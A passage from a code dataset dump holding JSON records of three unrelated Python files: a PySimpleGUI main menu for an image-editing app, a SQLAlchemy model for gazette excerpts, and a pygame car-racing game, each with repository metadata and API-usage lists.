"usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 500, "usage_type": "attribute"}, {"api_name": "utils.KEY.CONTENT", 
"line_number": 500, "usage_type": "attribute"}, {"api_name": "utils.KEY.ID", "line_number": 515, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 515, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 515, "usage_type": "attribute"}, {"api_name": "utils.KEY.COMMENT_ID", "line_number": 515, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 519, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 519, "usage_type": "name"}, {"api_name": "utils.KEY.COMMENT_ID", "line_number": 519, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 519, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 519, "usage_type": "attribute"}, {"api_name": "utils.KEY.ID", "line_number": 519, "usage_type": "attribute"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 531, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 531, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute_fetchall", "line_number": 537, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 537, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 537, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 537, "usage_type": "name"}, {"api_name": "utils.KEY.COMMENT_ID", "line_number": 540, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 540, "usage_type": "name"}, {"api_name": "utils.KEY.COMMENT_ID", "line_number": 561, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 561, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute_fetchone", "line_number": 566, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 566, "usage_type": "name"}, {"api_name": "utils.KEY.COMMENT_ID", "line_number": 566, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 566, "usage_type": "name"}, {"api_name": "utils.KEY.COMMENT_ID", "line_number": 569, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 569, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 570, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 570, "usage_type": "name"}, {"api_name": "utils.KEY.AUTHOR_ID", "line_number": 571, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 571, "usage_type": "name"}, {"api_name": "utils.KEY.CONTENT", "line_number": 572, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 572, "usage_type": "name"}, {"api_name": "utils.KEY.TIME", "line_number": 573, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 573, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 575, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 575, "usage_type": "name"}, {"api_name": "utils.KEY.AUTHOR_ID", "line_number": 575, "usage_type": "attribute"}, {"api_name": "utils.KEY.AUTHOR", "line_number": 578, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 578, "usage_type": "name"}, {"api_name": "utils.KEY.NICKNAME", "line_number": 578, "usage_type": "attribute"}, {"api_name": "utils.KEY.ID", "line_number": 596, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 596, "usage_type": "name"}, {"api_name": "utils.KEY.USER_ID", "line_number": 596, "usage_type": "attribute"}, {"api_name": "utils.KEY.TYPE", "line_number": 596, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 600, "usage_type": 
"call"}, {"api_name": "dbhelper.dbhelper", "line_number": 600, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 600, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 600, "usage_type": "name"}, {"api_name": "utils.KEY.USER_ID", "line_number": 600, "usage_type": "attribute"}, {"api_name": "utils.KEY.TYPE", "line_number": 600, "usage_type": "attribute"}, {"api_name": "utils.KEY.ID", "line_number": 616, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 616, "usage_type": "name"}, {"api_name": "utils.KEY.USER_ID", "line_number": 616, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 620, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 620, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 620, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 620, "usage_type": "name"}, {"api_name": "utils.KEY.USER_ID", "line_number": 620, "usage_type": "attribute"}, {"api_name": "utils.KEY.ID", "line_number": 639, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 639, "usage_type": "name"}, {"api_name": "utils.KEY.USER_ID", "line_number": 639, "usage_type": "attribute"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 639, "usage_type": "attribute"}, {"api_name": "utils.KEY.VALUE", "line_number": 641, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 641, "usage_type": "name"}, {"api_name": "ast.literal_eval", "line_number": 644, "usage_type": "call"}, {"api_name": "utils.KEY.VALUE", "line_number": 644, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 644, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 655, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 655, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 655, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 655, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 655, "usage_type": "attribute"}, {"api_name": "utils.KEY.USER_ID", "line_number": 655, "usage_type": "attribute"}, {"api_name": "utils.KEY.ID", "line_number": 671, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 671, "usage_type": "name"}, {"api_name": "utils.KEY.TYPE", "line_number": 671, "usage_type": "attribute"}, {"api_name": "utils.KEY.VALUE", "line_number": 671, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.insert", "line_number": 676, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 676, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 676, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 676, "usage_type": "name"}, {"api_name": "utils.KEY.TYPE", "line_number": 676, "usage_type": "attribute"}, {"api_name": "utils.KEY.VALUE", "line_number": 676, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.execute_fetchone", "line_number": 693, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 693, "usage_type": "name"}, {"api_name": "utils.KEY.HEALTH_ID", "line_number": 696, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 696, "usage_type": "name"}, {"api_name": "utils.KEY.USER_ID", "line_number": 697, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 697, "usage_type": "name"}, {"api_name": "utils.KEY.TYPE", "line_number": 698, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 698, "usage_type": 
"name"}, {"api_name": "utils.KEY.VALUE", "line_number": 699, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 699, "usage_type": "name"}, {"api_name": "utils.KEY.TIME", "line_number": 700, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 700, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 714, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 714, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute_fetchall", "line_number": 719, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 719, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 719, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 719, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 741, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 741, "usage_type": "name"}, {"api_name": "utils.KEY.CONTENT", "line_number": 741, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.insert", "line_number": 746, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 746, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 746, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 746, "usage_type": "name"}, {"api_name": "utils.KEY.CONTENT", "line_number": 746, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.execute_fetchone", "line_number": 763, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 763, "usage_type": "name"}, {"api_name": "utils.KEY.ILLNESS_ID", "line_number": 766, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 766, "usage_type": "name"}, {"api_name": "utils.KEY.USER_ID", "line_number": 767, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 767, "usage_type": "name"}, {"api_name": "utils.KEY.CONTENT", "line_number": 768, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 768, "usage_type": "name"}, {"api_name": "utils.KEY.TIME", "line_number": 769, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 769, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 783, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 783, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute_fetchall", "line_number": 789, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 789, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 789, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 789, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 809, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 809, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.insert", "line_number": 813, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 813, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 813, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 813, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 826, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 826, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.insert", "line_number": 832, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 832, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 832, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 832, "usage_type": "name"}, {"api_name": 
"dbhelper.dbhelper.execute_fetchone", "line_number": 851, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 851, "usage_type": "name"}]} +{"seq_id": "5330771592", "text": "import PySimpleGUI as sg\nimport ventanas.configuracion as confg\nimport os\nimport ventanas.GeneradorImagen as img\nimport ventanas.interfaz_meme as meme\nimport ventanas.ActualizarPerfil as act\nfrom PIL import Image, ImageDraw, ImageOps\nimport io\nimport os\nimport json\nimport ventanas.Ayuda as ayuda\nimport ventanas.EtiquetarImagenes as etiquetar\n\ndef MostrarImagen(ruta_imagen):\n imagen=Image.open(ruta_imagen)\n \n #Recorto la imagen de forma circular y la adapto a las medidas que yo busco \n \n ancho=50\n alto=50\n imagen = imagen.resize((ancho, alto))\n mascara = Image.new('L', (ancho, alto), 0)\n dibujo = ImageDraw.Draw(mascara)\n dibujo.ellipse((0, 0, ancho, alto), fill=350)\n imagen = ImageOps.fit(imagen, mascara.size, centering=(0.5, 0.5))\n imagen.putalpha(mascara)\n imagen = imagen.convert('RGBA')\n # Convertir la imagen en un búfer de bytes\n with io.BytesIO() as output:\n imagen.save(output, format='PNG')\n data = output.getvalue()\n return data\n\ndef crearVentana(datos,nickname):\n print(datos)\n directorio=os.path.abspath(os.path.dirname(__file__))\n directorio_imagenes=os.path.abspath(os.path.join(directorio,\"..\",\"imagenes\"))\n directorio_perfil=os.path.abspath(os.path.join(directorio_imagenes,nickname[0]+\".png\"))\n #sg.set_options(font=(\"Cooper Black\",16))\n data=MostrarImagen(directorio_perfil)\n\n menu =[ [sg.Image(background_color=\"tan\",size=(5,5))],\n [sg.Button('Generador de Memes',key=\"-mem-\",size=(25,1))],\n [sg.Image(background_color=\"tan\",size=(5,5))],\n [sg.Button('Generador de Collage',key=\"-collage-\",size=(25,1))],\n [sg.Image(background_color=\"tan\",size=(5,5))],\n [sg.Button('Etiquetar Imágenes',key=\"-img-\",size=(25,1))], \n [sg.Image(background_color=\"tan\",size=(5,5))],\n [sg.Button('Salir',pad=(90,2))]\n ]\n barra_layout =[sg.Column(\n [\n [sg.Button(image_data=data, enable_events=True, image_subsample=2, border_width=0, button_color=\"Tan\", key=\"-actualizar-\")],\n [sg.Text(\" \"+nickname[0], font=(\"Black\",11), background_color=\"Tan\")]\n ],\n element_justification=\"left\",\n justification=\"left\",\n background_color=\"Tan\"\n ),sg.Push(\"Tan\"),\n sg.Column(\n [[ \n sg.Button(image_filename=os.path.abspath(os.path.join(directorio_imagenes,\"configuracion.png\")),button_color=\"Tan\",key=\"config\",border_width=0), \n \n sg.Image(background_color=\"tan\",size=(5,5)),\n \n sg.Button(image_filename=os.path.abspath(os.path.join(directorio_imagenes,\"ayuda.png\")),button_color=\"Tan\", border_width=0,key='help'), \n ]])\n ]\n\n \n layout = [[\n barra_layout,\n sg.Column(menu,background_color=\"Tan\",)]\n ]\n \n window = sg.Window(\"Menú Principal\", layout,finalize=True,resizable=True,element_justification=\"Center\")\n window.set_min_size((500,500))\n window.BackgroundColor=(\"Tan\")\n directorio=os.path.abspath(os.path.dirname(__file__))\n directorio_direcciones=os.path.abspath(os.path.join(directorio,\"direcciones.txt\"))\n try:\n lectura=open(directorio_direcciones,\"r\")\n except FileNotFoundError:\n escritura=open(directorio_direcciones,\"w\")\n escritura.write (directorio_imagenes+\"@\"+directorio_imagenes+\"@\"+directorio_imagenes)\n escritura.close()\n lectura=open(directorio_direcciones,\"r\")\n lista=lectura.readline()\n lista=lista.split(\"@\")\n for e in lista:\n dir_im=lista[0]\n dir_coll=lista[1]\n dir_mem=lista[2]\n 
lectura.close()\n \n while True:\n event, values = window.read()\n \n if event in (sg.WIN_CLOSED, 'Salir'):\n break\n elif event == ('help'):\n ayuda.crearVentana()\n elif event==\"-actualizar-\":\n dicc={}\n directorio=os.path.abspath(os.path.dirname(__file__))\n directorio_direcciones=os.path.abspath(os.path.join(directorio,\"..\",\"perfiles.json\"))\n archivo=open(directorio_direcciones,\"r\") \n dicc=json.load(archivo)\n archivo.close()\n lista=act.CrearVentana(datos,nickname)\n print(lista)\n datos=lista\n dicc[nickname[0]]=lista\n archivo= open(directorio_direcciones,\"w\")\n json.dump(dicc,archivo)\n archivo.close()\n window[\"-actualizar-\"].update(image_data=MostrarImagen(dicc[nickname[0]][3]))\n elif event == 'config':\n confg.CrearVentana()\n elif event == '-mem-':\n meme.crearVentana()\n elif event == \"-collage-\":\n img.crearVentana()\n elif event==\"-img-\":\n etiquetar.crearVentana(dir_im,nickname)\n window.close()\n \n", "repo_name": "Valenturco/python_proyecto", "sub_path": "grupo36-main-unlpimage/unlpimage/ventanas/Menu_Principal.py", "file_name": "Menu_Principal.py", "file_ext": "py", "file_size_in_byte": 4934, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "PIL.Image.open", "line_number": 15, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 15, "usage_type": "name"}, {"api_name": "PIL.Image.new", "line_number": 22, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 22, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 23, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 23, "usage_type": "name"}, {"api_name": "PIL.ImageOps.fit", "line_number": 25, "usage_type": "call"}, {"api_name": "PIL.ImageOps", "line_number": 25, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 38, "usage_type": "call"}, {"api_name": "PySimpleGUI.Image", "line_number": 42, "usage_type": "call"}, {"api_name": "PySimpleGUI.Button", "line_number": 43, "usage_type": "call"}, {"api_name": "PySimpleGUI.Image", "line_number": 44, "usage_type": "call"}, {"api_name": "PySimpleGUI.Button", "line_number": 45, "usage_type": "call"}, {"api_name": "PySimpleGUI.Image", "line_number": 46, "usage_type": "call"}, {"api_name": "PySimpleGUI.Button", "line_number": 47, "usage_type": "call"}, {"api_name": "PySimpleGUI.Image", "line_number": 48, "usage_type": "call"}, {"api_name": "PySimpleGUI.Button", "line_number": 49, "usage_type": "call"}, {"api_name": "PySimpleGUI.Column", "line_number": 51, "usage_type": "call"}, {"api_name": "PySimpleGUI.Button", "line_number": 53, "usage_type": "call"}, {"api_name": "PySimpleGUI.Text", "line_number": 54, "usage_type": "call"}, {"api_name": "PySimpleGUI.Push", "line_number": 59, "usage_type": "call"}, {"api_name": "PySimpleGUI.Column", "line_number": 60, "usage_type": 
"call"}, {"api_name": "PySimpleGUI.Button", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path", "line_number": 62, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 62, "usage_type": "call"}, {"api_name": "PySimpleGUI.Image", "line_number": 64, "usage_type": "call"}, {"api_name": "PySimpleGUI.Button", "line_number": 66, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 66, "usage_type": "call"}, {"api_name": "os.path", "line_number": 66, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 66, "usage_type": "call"}, {"api_name": "PySimpleGUI.Column", "line_number": 73, "usage_type": "call"}, {"api_name": "PySimpleGUI.Window", "line_number": 76, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 79, "usage_type": "call"}, {"api_name": "os.path", "line_number": 79, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 79, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path", "line_number": 80, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 80, "usage_type": "call"}, {"api_name": "PySimpleGUI.WIN_CLOSED", "line_number": 99, "usage_type": "attribute"}, {"api_name": "ventanas.Ayuda.crearVentana", "line_number": 102, "usage_type": "call"}, {"api_name": "ventanas.Ayuda", "line_number": 102, "usage_type": "name"}, {"api_name": "os.path.abspath", "line_number": 105, "usage_type": "call"}, {"api_name": "os.path", "line_number": 105, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 105, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path", "line_number": 106, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 106, "usage_type": "call"}, {"api_name": "json.load", "line_number": 108, "usage_type": "call"}, {"api_name": "ventanas.ActualizarPerfil.CrearVentana", "line_number": 110, "usage_type": "call"}, {"api_name": "ventanas.ActualizarPerfil", "line_number": 110, "usage_type": "name"}, {"api_name": "json.dump", "line_number": 115, "usage_type": "call"}, {"api_name": "ventanas.configuracion.CrearVentana", "line_number": 119, "usage_type": "call"}, {"api_name": "ventanas.configuracion", "line_number": 119, "usage_type": "name"}, {"api_name": "ventanas.interfaz_meme.crearVentana", "line_number": 121, "usage_type": "call"}, {"api_name": "ventanas.interfaz_meme", "line_number": 121, "usage_type": "name"}, {"api_name": "ventanas.GeneradorImagen.crearVentana", "line_number": 123, "usage_type": "call"}, {"api_name": "ventanas.GeneradorImagen", "line_number": 123, "usage_type": "name"}, {"api_name": "ventanas.EtiquetarImagenes.crearVentana", "line_number": 125, "usage_type": "call"}, {"api_name": "ventanas.EtiquetarImagenes", "line_number": 125, "usage_type": "name"}]} +{"seq_id": "3221566909", "text": "from sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import Column, Integer, String, Date\nfrom sqlalchemy.types import PickleType\n\nBase = declarative_base()\n\nclass DBExcerpts(Base):\n __tablename__ = 'excerpts'\n\n excerpt_id = Column(String(100), \n primary_key=True,\n nullable=False, \n unique=True)\n excerpt_processed = Column(String(10005),\n nullable=False)\n city = Column(String(50), \n nullable=False)\n state = Column(String(2),\n nullable=False)\n excerpt_vector = 
Column(String(10),#PickleType\n nullable=False)\n source_date = Column(Date, \n nullable=False)\n\n# def __repr__(self):\n# return f\"Excerpt: {self.excerpt_processed} - Date: {self.source_date} - City: {self.state} - State: {self.city} - Vector: {self.excerpt_vector}\"\n\n", "repo_name": "MLRG-CEFET-RJ/qdrec", "sub_path": "api/querido_diario/db/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 930, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sqlalchemy.ext.declarative.declarative_base", "line_number": 5, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 10, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 10, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 14, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 14, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 16, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 16, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 18, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 18, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 20, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 20, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 22, "usage_type": "call"}, {"api_name": "sqlalchemy.Date", "line_number": 22, "usage_type": "argument"}]} +{"seq_id": "14432026174", "text": "#Imports\r\nimport pygame, sys\r\nfrom pygame.locals import *\r\nimport random, time\r\n\r\n#Initialzing the pygame\r\npygame.init()\r\n\r\n#Setting up FPS \r\nFPS = 60\r\nFramePerSec = pygame.time.Clock()\r\n\r\n#Creating colors\r\nBLUE = (0, 0, 255)\r\nRED = (255, 0, 0)\r\nGREEN = (0, 255, 0)\r\nBLACK = (0, 0, 0)\r\nWHITE = (255, 255, 255)\r\n\r\n#Other Variables for use in the program\r\nSCREEN_WIDTH = 400\r\nSCREEN_HEIGHT = 600\r\nSPEED = 5\r\nSCORE = 0\r\n\r\n#Setting up Fonts\r\nfont = pygame.font.SysFont(\"Verdana\", 60)\r\nfont_small = pygame.font.SysFont(\"Verdana\", 20)\r\ngame_over = font.render(\"Game Over\", True, BLACK)\r\n\r\nbackground = pygame.image.load(\"AnimatedStreet.png\") # loading a backgroud\r\n\r\n#Create a white screen \r\nDISPLAYSURF = pygame.display.set_mode((400,600))\r\nDISPLAYSURF.fill(WHITE)\r\npygame.display.set_caption(\"Game\")\r\n\r\n# Create a Coin class \r\nclass Coin(pygame.sprite.Sprite):\r\n def __init__(self):\r\n super().__init__()\r\n self.image = pygame.Surface((50,50)) # create a surface\r\n self.image.fill((255,232,0)) # Fill to the yellow color \r\n self.rect = self.image.get_rect() # convert to self rect\r\n self.rect.y = 0\r\n self.rect.x = random.randint(10,SCREEN_WIDTH-50) #Generate random position for x value\r\n def move(self):\r\n self.rect.y += 5 # moving with speed 5\r\n # if we do not collide with player then again generate on the top \r\n if self.rect.y > SCREEN_HEIGHT:\r\n self.rect.y = 0\r\n self.rect.x = random.randint(10,SCREEN_WIDTH-10)\r\n\r\n# create an Enemy class\r\nclass Enemy(pygame.sprite.Sprite):\r\n def __init__(self):\r\n super().__init__() \r\n self.image = pygame.image.load(\"Enemy.png\")\r\n self.rect = self.image.get_rect() # creating a rect object\r\n self.rect.center = (random.randint(40,SCREEN_WIDTH-40), 0) # creating a random position\r\n\r\n def move(self):\r\n global SCORE\r\n self.rect.move_ip(0,SPEED) # move_ip it is the rectangle 
function which help to change the position\r\n if (self.rect.bottom > 600):\r\n SCORE += 1 # if we do not collide with player , then + 1 point to the score \r\n self.rect.top = 0\r\n self.rect.center = (random.randint(40, SCREEN_WIDTH - 40), 0)\r\n\r\n# PLayer class\r\nclass Player(pygame.sprite.Sprite):\r\n def __init__(self):\r\n super().__init__() \r\n self.image = pygame.image.load(\"Player.png\")\r\n self.rect = self.image.get_rect() # create a rect object \r\n self.rect.center = (160, 520) # set the center \r\n \r\n def move(self):\r\n pressed_keys = pygame.key.get_pressed()\r\n # moving PLayer object to the right or to the left \r\n if self.rect.left > 0:\r\n if pressed_keys[K_LEFT]:\r\n self.rect.move_ip(-5, 0)\r\n if self.rect.right < SCREEN_WIDTH: \r\n if pressed_keys[K_RIGHT]:\r\n self.rect.move_ip(5, 0)\r\n \r\n\r\n#Setting up Sprites \r\nP1 = Player()\r\nE1 = Enemy()\r\nC1 = Coin()\r\n\r\n#Creating Sprites Groups\r\npoints = pygame.sprite.Group()\r\nenemies = pygame.sprite.Group()\r\nenemies.add(E1)\r\npoints.add(C1)\r\nall_sprites = pygame.sprite.Group()\r\nall_sprites.add(P1)\r\nall_sprites.add(E1)\r\nall_sprites.add(C1)\r\n\r\n#Adding a new User event \r\nINC_SPEED = pygame.USEREVENT + 1\r\npygame.time.set_timer(INC_SPEED, 1000) # each time after 1 second will appear this event\r\n# creating a score to the points \r\ncnt = 0 \r\n#Game Loop\r\npygame.mixer.music.load('background.wav')\r\npygame.mixer.music.play(0)\r\nwhile True:\r\n \r\n #Cycles through all events occuring \r\n for event in pygame.event.get():\r\n # OUR-EVENT \r\n if event.type == INC_SPEED:\r\n SPEED += 0.5 \r\n # SIMPLE-EVENT \r\n if event.type == QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n\r\n # blitting our background to the surface \r\n DISPLAYSURF.blit(background, (0,0))\r\n #creating surfaces\r\n scores = font_small.render(str(SCORE), True, BLACK)\r\n earnpoints = font_small.render(str(cnt),True,BLACK)\r\n # bliting the surfaces\r\n DISPLAYSURF.blit(scores, (10,10))\r\n DISPLAYSURF.blit(earnpoints,(300,10))\r\n #Moves and Re-draws all Sprites\r\n for entity in all_sprites:\r\n entity.move()\r\n DISPLAYSURF.blit(entity.image, entity.rect)\r\n \r\n \r\n\r\n #To be run if collision occurs between Player and COIN\r\n if pygame.sprite.spritecollide(P1,points,True):\r\n cnt += 1 # increase the count \r\n print(cnt)\r\n C1 = Coin() # verating a new sprite Coin \r\n # adding our Sprite to the Group \r\n points.add(C1)\r\n all_sprites.add(C1)\r\n\r\n #To be run if collision occurs between Player and Enemy\r\n\r\n if pygame.sprite.spritecollideany(P1, enemies):\r\n pygame.mixer.music.stop() # stop the background music \r\n pygame.mixer.Sound('crash.wav').play() # playing a crash music \r\n time.sleep(1)\r\n \r\n DISPLAYSURF.fill(RED) # fill to the red \r\n # blitting surface\r\n DISPLAYSURF.blit(game_over, (30,250))\r\n \r\n pygame.display.update() # updating the display!!!\r\n for entity in all_sprites:\r\n entity.kill() # killing the sprite objects \r\n time.sleep(2)\r\n pygame.quit() # quit the pygame \r\n sys.exit() # exit frm python\r\n \r\n pygame.display.update()\r\n FramePerSec.tick(FPS)\r\n", "repo_name": "Murapov11/Python", "sub_path": "LAB8/racer.py", "file_name": "racer.py", "file_ext": "py", "file_size_in_byte": 5433, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pygame.init", "line_number": 7, "usage_type": "call"}, {"api_name": "pygame.time.Clock", "line_number": 11, "usage_type": "call"}, {"api_name": 
"pygame.time", "line_number": 11, "usage_type": "attribute"}, {"api_name": "pygame.font.SysFont", "line_number": 27, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 27, "usage_type": "attribute"}, {"api_name": "pygame.font.SysFont", "line_number": 28, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 28, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 31, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 31, "usage_type": "attribute"}, {"api_name": "pygame.display.set_mode", "line_number": 34, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 34, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 36, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 36, "usage_type": "attribute"}, {"api_name": "pygame.sprite", "line_number": 39, "usage_type": "attribute"}, {"api_name": "pygame.Surface", "line_number": 42, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 46, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 52, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 55, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 58, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 58, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 60, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 68, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 71, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 74, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 74, "usage_type": "attribute"}, {"api_name": "pygame.key.get_pressed", "line_number": 79, "usage_type": "call"}, {"api_name": "pygame.key", "line_number": 79, 